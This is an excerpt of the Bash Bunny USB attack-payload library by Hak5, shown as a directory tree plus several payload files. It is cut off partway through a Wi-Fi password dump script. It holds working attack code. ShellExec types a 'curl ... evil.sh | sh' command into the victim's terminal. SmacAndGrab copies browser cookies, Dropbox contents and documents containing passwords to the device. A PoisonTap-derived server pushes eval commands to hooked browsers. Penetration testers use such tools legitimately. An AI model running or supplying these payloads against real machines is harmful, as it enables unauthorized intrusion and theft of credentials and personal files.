d.cmd │ ├── e.cmd │ ├── i.vbs │ ├── payload.txt │ └── readme.md ├── GitBunnyGit │ ├── README.md │ └── payload.txt ├── 
MacReverseShell │ ├── payload.txt │ └── readme.md ├── QuickCreds │ ├── payload.txt │ └── readme.md ├── RAZ_ReverseShell │ ├── listener_ip.txt │ ├── listener_port.txt │ └── payload.txt ├── RAZ_VBScript │ ├── a.vbs │ ├── listener_ip.txt │ ├── listener_port.txt │ └── payload.txt ├── ShellExec │ ├── evil.sh │ ├── hook.js │ ├── index.html │ ├── payload.txt │ └── readme.md ├── SmacAndGrab │ ├── payload.txt │ └── readme.md ├── WiPassDump │ ├── a.cmd │ ├── payload.txt │ └── readme.md ├── bunny_helpers.sh ├── faster_smb_exfiltrator │ ├── payload.txt │ ├── readme.md │ └── s.ps1 ├── fireytv │ ├── payload.txt │ └── readme.md ├── macinfograbber │ ├── payload.txt │ └── readme.md ├── nmapper │ ├── payload.txt │ └── readme.md ├── payloads.txt ├── rdp_checker │ ├── install.sh │ ├── payload.txt │ └── readme.md ├── smb_exfiltrator │ ├── payload.txt │ └── readme.md ├── tools_installer │ ├── install.sh │ ├── payload.txt │ ├── readme.txt │ └── tools_to_install │ │ ├── impacket │ │ ├── .gitignore │ │ ├── ChangeLog │ │ ├── LICENSE │ │ ├── MANIFEST.in │ │ ├── README.md │ │ ├── examples │ │ │ ├── GetADUsers.py │ │ │ ├── GetUserSPNs.py │ │ │ ├── atexec.py │ │ │ ├── esentutl.py │ │ │ ├── getPac.py │ │ │ ├── goldenPac.py │ │ │ ├── ifmap.py │ │ │ ├── karmaSMB.py │ │ │ ├── lookupsid.py │ │ │ ├── loopchain.py │ │ │ ├── mmcexec.py │ │ │ ├── mqtt_check.py │ │ │ ├── mssqlclient.py │ │ │ ├── mssqlinstance.py │ │ │ ├── netview.py │ │ │ ├── nmapAnswerMachine.py │ │ │ ├── ntfs-read.py │ │ │ ├── ntlmrelayx.py │ │ │ ├── opdump.py │ │ │ ├── os_ident.py │ │ │ ├── ping.py │ │ │ ├── ping6.py │ │ │ ├── psexec.py │ │ │ ├── raiseChild.py │ │ │ ├── rdp_check.py │ │ │ ├── reg.py │ │ │ ├── registry-read.py │ │ │ ├── rpcdump.py │ │ │ ├── samrdump.py │ │ │ ├── secretsdump.py │ │ │ ├── services.py │ │ │ ├── smbclient.py │ │ │ ├── smbexec.py │ │ │ ├── smbrelayx.py │ │ │ ├── smbserver.py │ │ │ ├── smbtorture.py │ │ │ ├── sniff.py │ │ │ ├── sniffer.py │ │ │ ├── split.py │ │ │ ├── ticketer.py │ │ │ ├── tracer.py │ │ │ ├── 
uncrc32.py │ │ │ ├── wmiexec.py │ │ │ ├── wmipersist.py │ │ │ └── wmiquery.py │ │ ├── impacket │ │ │ ├── Dot11Crypto.py │ │ │ ├── Dot11KeyManager.py │ │ │ ├── ICMP6.py │ │ │ ├── IP6.py │ │ │ ├── IP6_Address.py │ │ │ ├── IP6_Extension_Headers.py │ │ │ ├── ImpactDecoder.py │ │ │ ├── ImpactPacket.py │ │ │ ├── NDP.py │ │ │ ├── __init__.py │ │ │ ├── cdp.py │ │ │ ├── crypto.py │ │ │ ├── dcerpc │ │ │ │ ├── __init__.py │ │ │ │ └── v5 │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── atsvc.py │ │ │ │ │ ├── dcom │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── comev.py │ │ │ │ │ ├── oaut.py │ │ │ │ │ ├── scmp.py │ │ │ │ │ ├── vds.py │ │ │ │ │ └── wmi.py │ │ │ │ │ ├── dcomrt.py │ │ │ │ │ ├── drsuapi.py │ │ │ │ │ ├── dtypes.py │ │ │ │ │ ├── enum.py │ │ │ │ │ ├── epm.py │ │ │ │ │ ├── lsad.py │ │ │ │ │ ├── lsat.py │ │ │ │ │ ├── mgmt.py │ │ │ │ │ ├── ndr.py │ │ │ │ │ ├── nrpc.py │ │ │ │ │ ├── rpcrt.py │ │ │ │ │ ├── rrp.py │ │ │ │ │ ├── samr.py │ │ │ │ │ ├── sasec.py │ │ │ │ │ ├── scmr.py │ │ │ │ │ ├── srvs.py │ │ │ │ │ ├── transport.py │ │ │ │ │ ├── tsch.py │ │ │ │ │ └── wkst.py │ │ │ ├── dhcp.py │ │ │ ├── dns.py │ │ │ ├── dot11.py │ │ │ ├── eap.py │ │ │ ├── ese.py │ │ │ ├── examples │ │ │ │ ├── __init__.py │ │ │ │ ├── logger.py │ │ │ │ ├── ntlmrelayx │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── clients │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── httprelayclient.py │ │ │ │ │ │ ├── imaprelayclient.py │ │ │ │ │ │ ├── ldaprelayclient.py │ │ │ │ │ │ ├── mssqlrelayclient.py │ │ │ │ │ │ └── smbrelayclient.py │ │ │ │ │ ├── servers │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── httprelayserver.py │ │ │ │ │ │ └── smbrelayserver.py │ │ │ │ │ └── utils │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── config.py │ │ │ │ │ │ ├── targetsutils.py │ │ │ │ │ │ └── tcpshell.py │ │ │ │ ├── remcomsvc.py │ │ │ │ ├── secretsdump.py │ │ │ │ └── serviceinstall.py │ │ │ ├── helper.py │ │ │ ├── hresult_errors.py │ │ │ ├── krb5 │ │ │ │ ├── __init__.py │ │ │ │ ├── asn1.py │ │ │ │ ├── ccache.py │ │ │ │ ├── constants.py │ │ │ │ ├── crypto.py 
│ │ │ │ ├── gssapi.py │ │ │ │ ├── kerberosv5.py │ │ │ │ ├── pac.py │ │ │ │ └── types.py │ │ │ ├── ldap │ │ │ │ ├── __init__.py │ │ │ │ ├── ldap.py │ │ │ │ └── ldapasn1.py │ │ │ ├── mqtt.py │ │ │ ├── nmb.py │ │ │ ├── nt_errors.py │ │ │ ├── ntlm.py │ │ │ ├── pcap_linktypes.py │ │ │ ├── pcapfile.py │ │ │ ├── smb.py │ │ │ ├── smb3.py │ │ │ ├── smb3structs.py │ │ │ ├── smbconnection.py │ │ │ ├── smbserver.py │ │ │ ├── spnego.py │ │ │ ├── structure.py │ │ │ ├── system_errors.py │ │ │ ├── tds.py │ │ │ ├── testcases │ │ │ │ ├── ImpactPacket │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ ├── test_ICMP6.py │ │ │ │ │ ├── test_IP6.py │ │ │ │ │ ├── test_IP6_Address.py │ │ │ │ │ ├── test_IP6_Extension_Headers.py │ │ │ │ │ ├── test_TCP.py │ │ │ │ │ ├── test_TCP_bug_issue7.py │ │ │ │ │ └── test_ethernet.py │ │ │ │ ├── SMB_RPC │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── dcetests.cfg │ │ │ │ │ ├── rundce.sh │ │ │ │ │ ├── test_dcomrt.py │ │ │ │ │ ├── test_drsuapi.py │ │ │ │ │ ├── test_epm.py │ │ │ │ │ ├── test_ldap.py │ │ │ │ │ ├── test_lsad.py │ │ │ │ │ ├── test_lsat.py │ │ │ │ │ ├── test_mgmt.py │ │ │ │ │ ├── test_ndr.py │ │ │ │ │ ├── test_nmb.py │ │ │ │ │ ├── test_nrpc.py │ │ │ │ │ ├── test_ntlm.py │ │ │ │ │ ├── test_rpcrt.py │ │ │ │ │ ├── test_rrp.py │ │ │ │ │ ├── test_samr.py │ │ │ │ │ ├── test_scmr.py │ │ │ │ │ ├── test_smb.py │ │ │ │ │ ├── test_spnego.py │ │ │ │ │ ├── test_srvs.py │ │ │ │ │ ├── test_tsch.py │ │ │ │ │ ├── test_wkst.py │ │ │ │ │ └── test_wmi.py │ │ │ │ ├── __init__.py │ │ │ │ └── dot11 │ │ │ │ │ ├── runalltestcases.bat │ │ │ │ │ ├── runalltestcases.sh │ │ │ │ │ ├── test_Dot11Base.py │ │ │ │ │ ├── test_Dot11Decoder.py │ │ │ │ │ ├── test_Dot11HierarchicalUpdate.py │ │ │ │ │ ├── test_FrameControlACK.py │ │ │ │ │ ├── test_FrameControlCFEnd.py │ │ │ │ │ ├── test_FrameControlCFEndCFACK.py │ │ │ │ │ ├── test_FrameControlCTS.py │ │ │ │ │ ├── test_FrameControlPSPoll.py │ │ │ │ │ ├── test_FrameControlRTS.py │ │ │ │ │ ├── 
test_FrameData.py │ │ │ │ │ ├── test_FrameManagement.py │ │ │ │ │ ├── test_FrameManagementAssociationRequest.py │ │ │ │ │ ├── test_FrameManagementAssociationResponse.py │ │ │ │ │ ├── test_FrameManagementAuthentication.py │ │ │ │ │ ├── test_FrameManagementDeauthentication.py │ │ │ │ │ ├── test_FrameManagementDisassociation.py │ │ │ │ │ ├── test_FrameManagementProbeRequest.py │ │ │ │ │ ├── test_FrameManagementProbeResponse.py │ │ │ │ │ ├── test_FrameManagementReassociationRequest.py │ │ │ │ │ ├── test_FrameManagementReassociationResponse.py │ │ │ │ │ ├── test_RadioTap.py │ │ │ │ │ ├── test_RadioTapDecoder.py │ │ │ │ │ ├── test_WEPDecoder.py │ │ │ │ │ ├── test_WEPEncoder.py │ │ │ │ │ ├── test_WPA.py │ │ │ │ │ ├── test_WPA2.py │ │ │ │ │ ├── test_helper.py │ │ │ │ │ └── test_wps.py │ │ │ ├── uuid.py │ │ │ ├── version.py │ │ │ ├── winregistry.py │ │ │ └── wps.py │ │ └── setup.py │ │ └── responder │ │ ├── .gitignore │ │ ├── DumpHash.py │ │ ├── LICENSE │ │ ├── README.md │ │ ├── Report.py │ │ ├── Responder.conf │ │ ├── Responder.py │ │ ├── certs │ │ ├── gen-self-signed-cert.sh │ │ ├── responder.crt │ │ └── responder.key │ │ ├── files │ │ ├── AccessDenied.html │ │ └── BindShell.exe │ │ ├── fingerprint.py │ │ ├── logs │ │ └── .gitignore │ │ ├── odict.py │ │ ├── packets.py │ │ ├── poisoners │ │ ├── LLMNR.py │ │ ├── MDNS.py │ │ ├── NBTNS.py │ │ └── __init__.py │ │ ├── servers │ │ ├── Browser.py │ │ ├── DNS.py │ │ ├── FTP.py │ │ ├── HTTP.py │ │ ├── HTTP_Proxy.py │ │ ├── IMAP.py │ │ ├── Kerberos.py │ │ ├── LDAP.py │ │ ├── MSSQL.py │ │ ├── POP3.py │ │ ├── Proxy_Auth.py │ │ ├── SMB.py │ │ ├── SMTP.py │ │ └── __init__.py │ │ ├── settings.py │ │ ├── tools │ │ ├── BrowserListener.py │ │ ├── DHCP.py │ │ ├── DHCP_Auto.sh │ │ ├── FindSMB2UPTime.py │ │ ├── FindSQLSrv.py │ │ ├── Icmp-Redirect.py │ │ ├── MultiRelay.py │ │ ├── MultiRelay │ │ │ ├── RelayMultiCore.py │ │ │ ├── RelayMultiPackets.py │ │ │ ├── __init__.py │ │ │ ├── creddump │ │ │ │ ├── CHANGELOG │ │ │ │ ├── COPYING │ │ │ │ ├── 
README │ │ │ │ ├── cachedump.py │ │ │ │ ├── framework │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── addrspace.py │ │ │ │ │ ├── newobj.py │ │ │ │ │ ├── object.py │ │ │ │ │ ├── types.py │ │ │ │ │ └── win32 │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── domcachedump.py │ │ │ │ │ │ ├── hashdump.py │ │ │ │ │ │ ├── lsasecrets.py │ │ │ │ │ │ └── rawreg.py │ │ │ │ ├── lsadump.py │ │ │ │ └── pwdump.py │ │ │ └── relay-dumps │ │ │ │ └── .gitignore │ │ ├── RunFinger.py │ │ ├── SMBFinger │ │ │ ├── Finger.py │ │ │ ├── __init__.py │ │ │ └── odict.py │ │ └── odict.py │ │ └── utils.py └── usb_exfiltrator │ ├── d.cmd │ ├── e.cmd │ ├── i.vbs │ ├── payload.txt │ └── readme.md ├── switch1 └── payload.txt └── switch2 └── payload.txt /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.project 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Payload Library for the Bash Bunny by Hak5 2 | 3 | ![Bash Bunny](https://cdn.shopify.com/s/files/1/0068/2142/products/bashbunny_2a_large.png "Bash Bunny") 4 | 5 | * [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com") 6 | * [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki") 7 | * [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums") 8 | * IRC: irc.hak5.org #BashBunny 9 | -------------------------------------------------------------------------------- /payloads/library/90sMode/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: 90s Mode 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Category: Prank 7 | # Target: Windows XP SP3+ 8 | # 9 | # Turns back the clock to a k-rad ultra ereet 1990's VGA resolution 10 | # Executes p.ps1 from the selected switch folder of the Bash 
Bunny USB Disk partition, 11 | 12 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 13 | source bunny_helpers.sh 14 | 15 | LED R B 16 | ATTACKMODE HID STORAGE 17 | QUACK GUI r 18 | QUACK DELAY 100 19 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\r.ps1')" 20 | QUACK ENTER 21 | LED G -------------------------------------------------------------------------------- /payloads/library/90sMode/readme.md: -------------------------------------------------------------------------------- 1 | # 90s Mode for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.0 5 | * Category: Prank 6 | * Target: Windows XP SP3+ / Powershell 7 | 8 | 9 | ## Description 10 | 11 | Turns back the clock to a k-rad ultra ereet 1990's VGA resolution 12 | Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition. 13 | 14 | ## Unnecessary Background Story 15 | 16 | Once a family member asked me to troubleshoot their computer. They claimed their hard drive was filling up. I checked and they had barely used the enormous (at the time) 20 GB HDD. Sorry I said, everything looks good. No they exclaimed, loading all of these cool programs from the World Wide Web was fine, but there's barely any room for another icon! 17 | 18 | Oh. Yes. About that... So I did what any good geek would and increased their resolution from 800x600 to 1024x768. Voila! More desktop real estate! 19 | 20 | Great! But now I need my reading glasses! 
21 | 22 | So, one could say this payload *decreases* the disk space of the victim computer ;-) 23 | 24 | ## Configuration 25 | 26 | By default the payload switches to the very cool 640x480 resolution; however, this can be configured to other standards such as 800x600 or 1024x768 in the last line of r.ps1 (this should eventually become a config line in payload.txt) 27 | 28 | ## STATUS 29 | 30 | | LED | Status | 31 | | ------------------ | -------------------------------------------- | 32 | | Purple | Attack Setup | 33 | | Green | Attack Complete | 34 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/README.md: -------------------------------------------------------------------------------- 1 | # BunnyTap for Bash Bunnys 2 | 3 | Author: Whistle Master 4 | Version: Version 1.0 5 | Credit: @SamyKamkar 6 | 7 | ## Description 8 | 9 | Based on PoisonTap created by @SamyKamkar || https://samy.pl 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. 
Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | 15 | ## Requirements 16 | 17 | dnsspoof must be installed (use install.sh) 18 | 19 | ## Install LED STATUS 20 | 21 | | LED | Status | 22 | | ---------------- | -------------------------------------- | 23 | | White (blinking) | Dependencies not met | 24 | | Purple | Setup | 25 | | Purple (blinking)| Installing dependencies | 26 | | White (blinking) | Finished installing | 27 | | Red (blinking) | Install failed, no Internet connection | 28 | 29 | ## Payload LED STATUS 30 | 31 | | LED | Status | 32 | | ---------------- | -------------------------------------- | 33 | | Green (blinking) | BunnyTap Setup | 34 | | Blue | BunnyTap running | 35 | 36 | ## Discussion 37 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40240-poisontap-on-the-bunny/ "Hak5 Forum Thread") 38 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/alexa1m.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip -------------------------------------------------------------------------------- /payloads/library/BunnyTap/backend_server.js: -------------------------------------------------------------------------------- 1 | // PoisonTap by Samy Kamkar - https://samy.pl/poisontap 2 | 3 | //var _ = require('underscore') 4 | var WebSocketServer = require('websocket').server 5 | var webSocketsServerPort = 1337 6 | var http = require('http') 7 | var conns = [] 8 | var gr 9 | var server = http.createServer((request, response) => { 10 | console.log((new Date()) + ' HTTP server. 
URL ' + request.url + ' requested.') 11 | 12 | if (request.url.indexOf('/exec?') === 0) 13 | { 14 | response.writeHead(404, {'Content-Type': 'text/html'}) 15 | for (var i in conns) 16 | conns[i].sendUTF(JSON.stringify({ request: 'eval', content: request.url.substr(6) })) 17 | response.end("sent") 18 | } 19 | else if (request.url.indexOf('/send?') === 0) 20 | { 21 | response.writeHead(404, {'Content-Type': 'text/html'}) 22 | for (var i in conns) 23 | conns[i].sendUTF('{"' + decodeURI(request.url.substr(6)).replace(/"/g, '\\"').replace(/&/g, '","').replace(/=/g,'":"') + '"}') 24 | var checkgr = () => 25 | { 26 | if (gr) 27 | { 28 | response.end(gr) 29 | gr = "" 30 | } 31 | else 32 | setTimeout(checkgr, 500) 33 | } 34 | checkgr() 35 | } 36 | else if (request.url === '/status') 37 | { 38 | response.writeHead(200, {'Content-Type': 'application/json'}) 39 | var responseObject = { 40 | currentClients: 1234, 41 | totalHistory: 567 42 | } 43 | response.end(JSON.stringify(responseObject)) 44 | } 45 | else { 46 | response.writeHead(404, {'Content-Type': 'text/html'}) 47 | response.end('Sorry, unknown url') 48 | } 49 | }) 50 | server.listen(webSocketsServerPort, () => { 51 | console.log((new Date()) + " Server is listening on port " + webSocketsServerPort) 52 | }) 53 | 54 | // create the server 55 | wsServer = new WebSocketServer({ 56 | httpServer: server 57 | }) 58 | 59 | function handleReq(obj, con) 60 | { 61 | if (obj.request === 'getresponse') 62 | gr = obj.html 63 | } 64 | 65 | wsServer.on('request', (request) => { 66 | var obj 67 | var connection = request.accept(null, request.origin) 68 | conns.push(connection) 69 | 70 | connection.on('request', (message) => { 71 | console.log('request: ' + message) 72 | }) 73 | 74 | connection.on('message', (message) => { 75 | try { obj = JSON.parse(message.utf8Data) } catch(e) { } 76 | console.log('message: ' + message.utf8Data) 77 | console.log(obj) 78 | 79 | if (typeof(obj) === 'object') 80 | handleReq(obj, connection) 81 | else 82 
| connection.sendUTF('hello') 83 | }) 84 | 85 | // remove connection from our list 86 | connection.on('close', connection => { 87 | console.log('connection closed') 88 | for (var i in conns) 89 | if (conns[i] == connection) 90 | //if (_.isEqual(conns[i], connection)) // XXX 91 | conn.splice(i, 1) 92 | }) 93 | }) 94 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/install.sh: -------------------------------------------------------------------------------- 1 | # Installs dependencies for BunnyTap payload 2 | # Requires Internet connection 3 | # See documentation for Internet Connection Sharing details 4 | # 5 | # LED STATUS 6 | # purple..............setup 7 | # purple (blinking)...installing dependencies 8 | # white (blinking)....finished installing 9 | # red (blinking)......install failed, no Internet connection 10 | 11 | 12 | # Setup Ethernet (Switch RNDIS to ECM if Mac/Linux) 13 | LED R B 14 | ATTACKMODE RNDIS_ETHERNET 15 | # ATTACKMODE ECM_ETHERNET 16 | 17 | # Check if connected to the Internet 18 | wget -q --tries=5 --timeout=15 --spider http://example.com 19 | if [[ $? 
-eq 0 ]]; then 20 | # Online 21 | LED R B 100 22 | apt-get -y install dsniff 23 | LED R G B 50 24 | sleep 2 25 | exit 0 26 | else 27 | # Offline 28 | LED R 100 29 | exit 1 30 | fi -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__angularjs__1.4.0-beta6__angular.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__jquery__2.1.2__jquery.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.1.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.3__mootools.min.js: 
-------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.2.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.3.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | 
-------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.2__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.3__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.4__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.4.5__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.0__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__mootools__1.5.1__mootools.min.js: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js: -------------------------------------------------------------------------------- 1 | // script.aculo.us scriptaculous.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008 2 | 3 | // Copyright (c) 2005-2007 Thomas Fuchs 
(http://script.aculo.us, http://mir.aculo.us) 4 | // 5 | // Permission is hereby granted, free of charge, to any person obtaining 6 | // a copy of this software and associated documentation files (the 7 | // "Software"), to deal in the Software without restriction, including 8 | // without limitation the rights to use, copy, modify, merge, publish, 9 | // distribute, sublicense, and/or sell copies of the Software, and to 10 | // permit persons to whom the Software is furnished to do so, subject to 11 | // the following conditions: 12 | // 13 | // The above copyright notice and this permission notice shall be 14 | // included in all copies or substantial portions of the Software. 15 | // 16 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 19 | // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 20 | // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 21 | // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 22 | // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 23 | // 24 | // For details, see the script.aculo.us web site: http://script.aculo.us/ 25 | 26 | var Scriptaculous = { 27 | Version: '1.8.1', 28 | require: function(libraryName) { 29 | // inserting via DOM fails in Safari 2.0, so brute force approach 30 | document.write(' 4 | 5 | 6 | 7 | Nothing to see here! 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /payloads/library/ShellExec/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Title: ShellExec 4 | # Author: audibleblink 5 | # Target: Mac/Linux 6 | # Version: 1.0 7 | # 8 | # Create a web server on the BashBunny and forces 9 | # the victim download and execute a script. 
10 | # 11 | # White | Ready 12 | # Ammber blinking | Waiting for server 13 | # Blue blinking | Attacking 14 | # Green | Finished 15 | 16 | LED R G B 17 | ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E 18 | 19 | source bunny_helpers.sh 20 | 21 | payload_dir=/root/udisk/payloads/$SWITCH_POSITION 22 | log_file=$payload_dir/shellexec.log 23 | 24 | cd $payload_dir 25 | 26 | # starting server 27 | LED R G 500 28 | 29 | # disallow outgoing dns requests so server starts immediately 30 | iptables -A OUTPUT -p udp --dport 53 -j DROP 31 | python -m SimpleHTTPServer 80 32 | 33 | # wait until port is listening 34 | while ! nc -z localhost 80; do sleep 0.2; done 35 | 36 | # attack commences 37 | LED B 500 38 | 39 | Q GUI SPACE 40 | Q DELAY 300 41 | Q STRING terminal 42 | Q DELAY 100 43 | Q ENTER 44 | Q DELAY 2000 45 | 46 | # Q ALT F2 # swap with block above for linux 47 | # Q DELAY 100 48 | 49 | Q STRING curl "http://$HOST_IP/evil.sh" \| sh 50 | # in case curl isn't installed 51 | # Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh 52 | Q ENTER 53 | 54 | LED G 55 | -------------------------------------------------------------------------------- /payloads/library/ShellExec/readme.md: -------------------------------------------------------------------------------- 1 | # ShellExec 2 | 3 | Author: audibleblink 4 | Version: 1.0 5 | 6 | ## Description 7 | 8 | Serves malicious scripts or web pages from the Bunny and forces 9 | victims to curl and execute those scripts. Scripts can also force 10 | browsers to open a url on the bunny to do things like serve BeEF 11 | hooks. 
12 | 13 | ## Configuration 14 | 15 | evil.py - script that is fetched with DuckyScript 16 | (provided script opens a web page that serves a BeEF hook ) 17 | 18 | hook.js - the aforementioned BeEF hook 19 | 20 | index.html - BeEF hook delivery page 21 | 22 | ## Requirements 23 | 24 | Just plug and play 25 | 26 | ## Status 27 | 28 | | LED | Status | 29 | | --------- | ----------- | 30 | | White | Ready | 31 | | Amber blinking | Waiting for server | 32 | | Blue blinking | Attacking | 33 | | Green | Finished | 34 | 35 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: sMacAndGrab 4 | # Author: audibleblink 5 | # Target: macOS 6 | # Version: 1.1 7 | # 8 | # Backup a list of files from macOS 9 | # 10 | # Yellow (blinking)...Attacking 11 | # Green...............Finished 12 | 13 | LED G R 500 14 | ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E 15 | 16 | # make the loot directory on the BashBunny 17 | mkdir -p /root/udisk/loot/sMacAndGrab 18 | 19 | # mounted device name 20 | dev_name="BashBunny" 21 | 22 | # loot directory when mounted on the mac 23 | lootdir="/Volumes/$dev_name/loot/sMacAndGrab" 24 | 25 | # Add files, folders, or commands that return filenames 26 | files_to_copy=( 27 | "\"~/Library/Application Support/Google/Chrome/Default/Cookies\"" # Quote paths with spaces 28 | "~/Dropbox" 29 | "\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET 30 | ) 31 | 32 | QUACK GUI SPACE 33 | QUACK DELAY 1000 34 | QUACK STRING terminal 35 | QUACK ENTER 36 | QUACK DELAY 4000 37 | # the more files in $files to copy, the longer tar will take to compress 38 | # one-liner because we want the move command to wait for tar to finish 39 | QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal 40 | QUACK ENTER 41 | 42 | # sync 
the filesystem 43 | sync 44 | LED G 45 | 46 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/readme.md: -------------------------------------------------------------------------------- 1 | # sMacAndGrab 2 | 3 | Author: audibleblink 4 | Version: Version 1.1 5 | Target: macOS 6 | 7 | ## Description 8 | 9 | Mounts as storage and acts as HID. Backup a list of files to the BashBunny 10 | 11 | ## Configuration 12 | 13 | Provide a newline-separated list of files you want to backup and wait for the green light. 14 | You can also provide `find` and `grep` commands as literal strings to pass to QUACK which get run on TARGET. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ---------------- | ------------------------------------- | 20 | | Amber (blinking) | Attacking | 21 | | Green | Finished | 22 | 23 | -------------------------------------------------------------------------------- /payloads/library/WiPassDump/a.cmd: -------------------------------------------------------------------------------- 1 | REM Go to dump directory 2 | cd /d %~dp0 3 | cd ../../loot/WiPassDump/ 4 | 5 | REM Dump saved Wi-Fi 